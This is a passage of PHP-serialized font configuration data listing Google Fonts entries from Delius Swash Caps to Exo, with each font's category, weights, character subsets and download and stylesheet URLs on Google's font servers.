Caps";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/deliusswashcaps/v8/uXyrEUnoWApxIOICunRq7yIrxb5zDVgU2N3VzXm7zq4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Delius+Swash+Caps:regular";}}s:14:"delius_unicase";a:7:{s:4:"name";s:14:"Delius Unicase";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/deliusunicase/v9/b2sKujV3Q48RV2PQ0k1vqu6rPKfVZo7L2bERcf0BDns.ttf";i:700;s:91:"http://fonts.gstatic.com/s/deliusunicase/v9/7FTMTITcb4dxUp99FAdTqNy5weKXdcrx-wE0cgECMq8.ttf";}s:4:"urls";a:2:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Delius+Unicase:regular";i:700;s:58:"https://fonts.googleapis.com/css?family=Delius+Unicase:700";}}s:13:"della_respira";a:7:{s:4:"name";s:13:"Della Respira";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/dellarespira/v4/F4E6Lo_IZ6L9AJCcbqtDVeDcg5akpSnIcsPhLOFv7l8.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Della+Respira:regular";}}s:8:"denk_one";a:7:{s:4:"name";s:8:"Denk One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/denkone/v4/TdXOeA4eA_hEx4W8Sh9wPw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Denk+One:regular";}}s:10:"devonshire";a:7:{s:4:"name";s:10:"Devonshire";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/devonshire/v5/I3ct_2t12SYizP8ZC-KFi_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Devonshire:regular";}}s:8:"dhurjati";a:7:{s:4:"name";s:8:"Dhurjati";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/dhurjati/v4/uV6jO5e2iFMbGB0z79Cy5g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Dhurjati:regular";}}s:13:"didact_gothic";a:7:{s:4:"name";s:13:"Didact Gothic";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:6:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:12:"cyrillic-ext";i:4;s:9:"latin-ext";i:5;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/didactgothic/v7/v8_72sD3DYMKyM0dn3LtWotBLojGU5Qdl8-5NL4v70w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Didact+Gothic:regular";}}s:9:"diplomata";a:7:{s:4:"name";s:9:"Diplomata";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/diplomata/v8/u-ByBiKgN6rTMA36H3kcKg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Diplomata:regular";}}s:12:"diplomata_sc";a:7:{s:4:"name";s:12:"Diplomata SC";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/diplomatasc/v5/JdVwAwfE1a_pahXjk5qpNi3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Diplomata+SC:regular";}}s:6:"domine";a:7:{s:4:"name";s:6:"Domine";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/domine/v4/wfVIgamVFjMNQAEWurCiHA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/domine/v4/phBcG1ZbQFxUIt18hPVxnw.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Domine:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Domine:700";}}s:11:"donegal_one";a:7:{s:4:"name";s:11:"Donegal One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/donegalone/v4/6kN4-fDxz7T9s5U61HwfF6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Donegal+One:regular";}}s:10:"doppio_one";a:7:{s:4:"name";s:10:"Doppio One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/doppioone/v4/WHZ3HJQotpk_4aSMNBo_t_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Doppio+One:regular";}}s:5:"dorsa";a:7:{s:4:"name";s:5:"Dorsa";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/dorsa/v7/wCc3cUe6XrmG2LQE6GlIrw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Dorsa:regular";}}s:5:"dosis";a:7:{s:4:"name";s:5:"Dosis";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";i:6;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:7:{i:200;s:62:"http://fonts.gstatic.com/s/dosis/v6/ztftab0r6hcd7AeurUGrSQ.ttf";i:300;s:62:"http://fonts.gstatic.com/s/dosis/v6/awIB6L0h5mb0plIKorXmuA.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/dosis/v6/rJRlixu-w0JZ1MyhJpao_Q.ttf";i:500;s:62:"http://fonts.gstatic.com/s/dosis/v6/ruEXDOFMxDPGnjCBKRqdAQ.ttf";i:600;s:62:"http://fonts.gstatic.com/s/dosis/v6/KNAswRNwm3tfONddYyidxg.ttf";i:700;s:62:"http://fonts.gstatic.com/s/dosis/v6/AEEAj0ONidK8NQQMBBlSig.ttf";i:800;s:62:"http://fonts.gstatic.com/s/dosis/v6/nlrKd8E69vvUU39XGsvR7Q.ttf";}s:4:"urls";a:7:{i:200;s:49:"https://fonts.googleapis.com/css?family=Dosis:200";i:300;s:49:"https://fonts.googleapis.com/css?family=Dosis:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Dosis:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Dosis:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Dosis:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Dosis:700";i:800;s:49:"https://fonts.googleapis.com/css?family=Dosis:800";}}s:11:"dr_sugiyama";a:7:{s:4:"name";s:11:"Dr Sugiyama";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/drsugiyama/v5/S5Yx3MIckgoyHhhS4C9Tv6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Dr+Sugiyama:regular";}}s:10:"droid_sans";a:7:{s:4:"name";s:10:"Droid Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/droidsans/v6/rS9BT6-asrfjpkcV3DXf__esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:87:"http://fonts.gstatic.com/s/droidsans/v6/EFpQQyG9GqCrobXxL-KRMQJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Droid+Sans:regular";i:700;s:54:"https://fonts.googleapis.com/css?family=Droid+Sans:700";}}s:15:"droid_sans_mono";a:7:{s:4:"name";s:15:"Droid Sans Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/droidsansmono/v7/ns-m2xQYezAtqh7ai59hJcwD6PD0c3_abh9zHKQtbGU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Droid+Sans+Mono:regular";}}s:11:"droid_serif";a:7:{s:4:"name";s:11:"Droid Serif";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/droidserif/v6/DgAtPy6rIVa2Zx3Xh9KaNaCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/droidserif/v6/cj2hUnSRBhwmSPr9kS5890eOrDcLawS7-ssYqLr2Xp4.ttf";i:700;s:88:"http://fonts.gstatic.com/s/droidserif/v6/QQt14e8dY39u-eYBZmppwXe1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:88:"http://fonts.gstatic.com/s/droidserif/v6/c92rD_x0V1LslSFt3-QEps_zJjSACmk0BRPxQqhnNLU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Droid+Serif:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Droid+Serif:italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Droid+Serif:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Droid+Serif:700italic";}}s:9:"duru_sans";a:7:{s:4:"name";s:9:"Duru Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/durusans/v9/xn7iYH8xwmSyTvEV_HOxTw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Duru+Sans:regular";}}s:9:"dynalight";a:7:{s:4:"name";s:9:"Dynalight";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/dynalight/v5/-CWsIe8OUDWTIHjSAh41kA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Dynalight:regular";}}s:11:"eb_garamond";a:7:{s:4:"name";s:11:"EB Garamond";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/ebgaramond/v7/CDR0kuiFK7I1OZ2hSdR7G6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=EB+Garamond:regular";}}s:10:"eagle_lake";a:7:{s:4:"name";s:10:"Eagle Lake";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/eaglelake/v4/ZKlYin7caemhx9eSg6RvPfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Eagle+Lake:regular";}}s:5:"eater";a:7:{s:4:"name";s:5:"Eater";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/eater/v5/gm6f3OmYEdbs3lPQtUfBkA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Eater:regular";}}s:9:"economica";a:7:{s:4:"name";s:9:"Economica";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/economica/v4/G4rJRujzZbq9Nxngu9l3hg.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/economica/v4/p5O9AVeUqx_n35xQRinNYaCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:87:"http://fonts.gstatic.com/s/economica/v4/UK4l2VEpwjv3gdcwbwXE9C3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/economica/v4/ac5dlUsedQ03RqGOeay-3Xe1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Economica:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Economica:italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Economica:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Economica:700italic";}}s:5:"eczar";a:7:{s:4:"name";s:5:"Eczar";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";i:4;s:3:"800";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/eczar/v4/uKZcAQ5JBBs1UbeXFRbBRg.ttf";i:500;s:62:"http://fonts.gstatic.com/s/eczar/v4/Ooe4KaPp2594tF8TbMfdlQ.ttf";i:600;s:62:"http://fonts.gstatic.com/s/eczar/v4/IjQsWW0bmgkZ6lnN72cnTQ.ttf";i:700;s:62:"http://fonts.gstatic.com/s/eczar/v4/ELC8RVXfBMb3VuuHtMwBOA.ttf";i:800;s:62:"http://fonts.gstatic.com/s/eczar/v4/9Uyt6nTZLx_Qj5_WRah-iQ.ttf";}s:4:"urls";a:5:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Eczar:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Eczar:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Eczar:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Eczar:700";i:800;s:49:"https://fonts.googleapis.com/css?family=Eczar:800";}}s:8:"ek_mukta";a:7:{s:4:"name";s:8:"Ek Mukta";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";i:6;s:3:"800";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:7:{i:200;s:85:"http://fonts.gstatic.com/s/ekmukta/v7/crtkNHh5JcM3VJKG0E-B36CWcynf_cDxXwCLxiixG1c.ttf";i:300;s:85:"http://fonts.gstatic.com/s/ekmukta/v7/mpaAv7CIyk0VnZlqSneVxKCWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/ekmukta/v7/aFcjXdC5jyJ1p8w54wIIrg.ttf";i:500;s:85:"http://fonts.gstatic.com/s/ekmukta/v7/PZ1y2MstFczWvBlFSgzMyaCWcynf_cDxXwCLxiixG1c.ttf";i:600;s:85:"http://fonts.gstatic.com/s/ekmukta/v7/Z5Mfzeu6M3emakcJO2QeTqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:85:"http://fonts.gstatic.com/s/ekmukta/v7/4ugcOGR28Jn-oBIn0-qLYaCWcynf_cDxXwCLxiixG1c.ttf";i:800;s:85:"http://fonts.gstatic.com/s/ekmukta/v7/O68TH5OjEhVmn9_gIrcfS6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:7:{i:200;s:52:"https://fonts.googleapis.com/css?family=Ek+Mukta:200";i:300;s:52:"https://fonts.googleapis.com/css?family=Ek+Mukta:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Ek+Mukta:regular";i:500;s:52:"https://fonts.googleapis.com/css?family=Ek+Mukta:500";i:600;s:52:"https://fonts.googleapis.com/css?family=Ek+Mukta:600";i:700;s:52:"https://fonts.googleapis.com/css?family=Ek+Mukta:700";i:800;s:52:"https://fonts.googleapis.com/css?family=Ek+Mukta:800";}}s:10:"el_messiri";a:7:{s:4:"name";s:10:"El Messiri";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/elmessiri/v1/dik94vfrFvHFnvdvxaX8N_esZW2xOQ-xsNqO47m55DA.ttf";i:500;s:87:"http://fonts.gstatic.com/s/elmessiri/v1/kQW9PA2krAOzditagrX75pp-63r6doWhTEbsfBIRJ7A.ttf";i:600;s:87:"http://fonts.gstatic.com/s/elmessiri/v1/HYl7TNqFfA1utGLZRWwzLPpTEJqju4Hz1txDWij77d4.ttf";i:700;s:87:"http://fonts.gstatic.com/s/elmessiri/v1/ji73glXFIetaSqMU3cz7rAJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:4:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=El+Messiri:regular";i:500;s:54:"https://fonts.googleapis.com/css?family=El+Messiri:500";i:600;s:54:"https://fonts.googleapis.com/css?family=El+Messiri:600";i:700;s:54:"https://fonts.googleapis.com/css?family=El+Messiri:700";}}s:11:"electrolize";a:7:{s:4:"name";s:11:"Electrolize";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/electrolize/v5/yFVu5iokC-nt4B1Cyfxb9aCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Electrolize:regular";}}s:5:"elsie";a:7:{s:4:"name";s:5:"Elsie";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/elsie/v5/gwspePauE45BJu6Ok1QrfQ.ttf";i:900;s:62:"http://fonts.gstatic.com/s/elsie/v5/1t-9f0N2NFYwAgN7oaISqg.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Elsie:regular";i:900;s:49:"https://fonts.googleapis.com/css?family=Elsie:900";}}s:16:"elsie_swash_caps";a:7:{s:4:"name";s:16:"Elsie Swash Caps";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/elsieswashcaps/v4/9L3hIJMPCf6sxCltnxd6X2YeFSdnSpRYv5h9gpdlD1g.ttf";i:900;s:92:"http://fonts.gstatic.com/s/elsieswashcaps/v4/iZnus9qif0tR5pGaDv5zdKoKBWBozTtxi30NfZDOXXU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Elsie+Swash+Caps:regular";i:900;s:60:"https://fonts.googleapis.com/css?family=Elsie+Swash+Caps:900";}}s:11:"emblema_one";a:7:{s:4:"name";s:11:"Emblema One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/emblemaone/v5/7IlBUjBWPIiw7cr_O2IfSaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Emblema+One:regular";}}s:12:"emilys_candy";a:7:{s:4:"name";s:12:"Emilys Candy";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/emilyscandy/v4/PofLVm6v1SwZGOzC8s-I3S3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Emilys+Candy:regular";}}s:10:"engagement";a:7:{s:4:"name";s:10:"Engagement";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/engagement/v5/4Uz0Jii7oVPcaFRYmbpU6vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Engagement:regular";}}s:9:"englebert";a:7:{s:4:"name";s:9:"Englebert";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/englebert/v4/sll38iOvOuarDTYBchlP3Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Englebert:regular";}}s:9:"enriqueta";a:7:{s:4:"name";s:9:"Enriqueta";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/enriqueta/v5/_p90TrIwR1SC-vDKtmrv6A.ttf";i:700;s:87:"http://fonts.gstatic.com/s/enriqueta/v5/I27Pb-wEGH2ajLYP0QrtSC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Enriqueta:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Enriqueta:700";}}s:9:"erica_one";a:7:{s:4:"name";s:9:"Erica One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/ericaone/v7/cIBnH2VAqQMIGYAcE4ufvQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Erica+One:regular";}}s:7:"esteban";a:7:{s:4:"name";s:7:"Esteban";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/esteban/v4/ESyhLgqDDyK5JcFPp2svDw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Esteban:regular";}}s:15:"euphoria_script";a:7:{s:4:"name";s:15:"Euphoria Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/euphoriascript/v4/c4XB4Iijj_NvSsCF4I0O2MxLhO8OSNnfAp53LK1_iRs.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Euphoria+Script:regular";}}s:5:"ewert";a:7:{s:4:"name";s:5:"Ewert";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/ewert/v4/Em8hrzuzSbfHcTVqMjbAQg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Ewert:regular";}}s:3:"exo";a:7:{s:4:"name";s:3:"Exo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:60:"http://fonts.gstatic.com/s/exo/v4/RI7A9uwjRmPbVp0n8e-Jvg.ttf";s:9:"100italic";s:60:"http://fonts.gstatic.com/s/exo/v4/qtGyZZlWb2EEvby3ZPosxw.ttf";i:200;s:60:"http://fonts.gstatic.com/s/exo/v4/F8OfC_swrRRxpFt-tlXZQg.ttf";s:9:"200italic";s:60:"http://fonts.gstatic.com/s/exo/v4